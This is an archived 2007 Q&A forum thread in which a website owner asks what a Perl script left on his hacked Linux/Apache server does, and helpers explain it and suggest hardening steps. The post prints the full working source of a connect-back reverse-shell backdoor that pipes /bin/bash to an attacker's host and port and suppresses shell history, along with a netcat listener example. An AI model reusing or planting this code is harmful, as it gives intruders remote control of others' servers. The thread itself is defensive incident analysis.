Solved

Site hacked - Linux/Apache... Perl script involved?

Posted on 2007-03-28
6
500 Views
Last Modified: 2012-06-27
Site hacked last Sunday. I changed the password a few times but somehow they got back in on Tuesday. Has been quiet for 24 hours now. I completely changed the password, wiped out all files in the directory, and re-uploaded clean files. Other than a few modified HTML pages, I found the Perl script listed below. I can't read Perl, can anyone make any sense of this? Does it give any clues as to how they got in? Hosting company has been less than helpful, unfortunately.

Thanks,
-Brad

---------------------------------------------------------------------------------------------

#!/usr/bin/perl
use IO::Socket;
#   Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell          
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90                                          
# Email:LorD@ihsteam.com
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system      = '/bin/bash';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--  \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF
0
Comment
Question by:bbdesign
  • 3
  • 2
6 Comments
 
LVL 1

Accepted Solution

by:
the__tyrant earned 500 total points
ID: 18810637
Looks like they somehow manage to upload this to your site - do you have any file uploads in any of your html pages?  if so do those directories allow the execution of perl scripts?  Could we get a bit more info about the setup of your server/site - like does it allow shell accounts?

Seems as though they are sending back a bash shell through netcat (nc -vv -l -p 2121)
netcat: http://netcat.sourceforge.net/

Tell your service provider to turn off perl/cgi scripts in the apache config, unless you need them, and if you do, only allow scripts to be run out of the cgi-bin. (and if you do have an upload file script, make it upload to a directory other than cgi-bin)
0
 

Author Comment

by:bbdesign
ID: 18810705
No file uploads in the PHP pages.

I believe the only interactivity is the contact form. Would that be affected if I turn off perl/cgi scripts? Definitely no file upload scripts, though.

If that isn't the case, not sure how they would have gotten the file there, other than by knowing the username/password. This was a brand new hosting account, brand new IP, etc. Was only up for a few days.

I'll check with the hosting provider on some of the other items you mention.

Thanks.
0
 
LVL 1

Expert Comment

by:the__tyrant
ID: 18810854
Well if you've got only php scripts and no perl scripts anywhere, then nothing would be effected.   Not exactly sure...could the username/password be easily cracked? (does the password have special chars like ! or : or whatver else as well as numbers?)

the hosting provider should be worried about this since they are gaining access to a server controlled by them - ask them for the system logs pertaining to your site/user maybe, might shed some more light on how they are getting the script on the server.
0
Free Trending Threat Insights Every Day

Enhance your security with threat intelligence from the web. Get trending threat insights on hackers, exploits, and suspicious IP addresses delivered to your inbox with our free Cyber Daily.

 

Author Comment

by:bbdesign
ID: 18810898
Password is pretty secure. Like I said, this was a brand new account, in within 48 hours it was hacked.

Hosting provider is surprisingly less worried than I thought they would be. Have to break through their first line of tech support, probably.

Thanks for your help.
0
 
LVL 1

Expert Comment

by:the__tyrant
ID: 18810973
Hopefully it gets solved, but in any case i think the best bet would to get the provider to stop disable perl execution on any of your web exposed directories.

Cheers, and good luck with tech support ;)
0
 
LVL 39

Expert Comment

by:Adam314
ID: 18811823
You can probably get the access logs - most hosting providers will give those to you.  Look through this for anything suspicious.

0

Featured Post

How to run any project with ease

Manage projects of all sizes how you want. Great for personal to-do lists, project milestones, team priorities and launch plans.
- Combine task lists, docs, spreadsheets, and chat in one
- View and edit from mobile/offline
- Cut down on emails

Join & Write a Comment

Transferring data across the virtual world became simpler but protecting it is becoming a real security challenge.  How to approach cyber security  in today's business world!
Today, still in the boom of Apple, PC's and products, nearly 50% of the computer users use Windows as graphical operating systems. If you are among those users who love windows, but are grappling to keep the system's hard drive optimized, then you s…
Explain concepts important to validation of email addresses with regular expressions. Applies to most languages/tools that uses regular expressions. Consider email address RFCs: Look at HTML5 form input element (with type=email) regex pattern: T…
You have products, that come in variants and want to set different prices for them? Watch this micro tutorial that describes how to configure prices for Magento super attributes. Assigning simple products to configurable: We assigned simple products…

708 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

17 Experts available now in Live!

Get 1:1 Help Now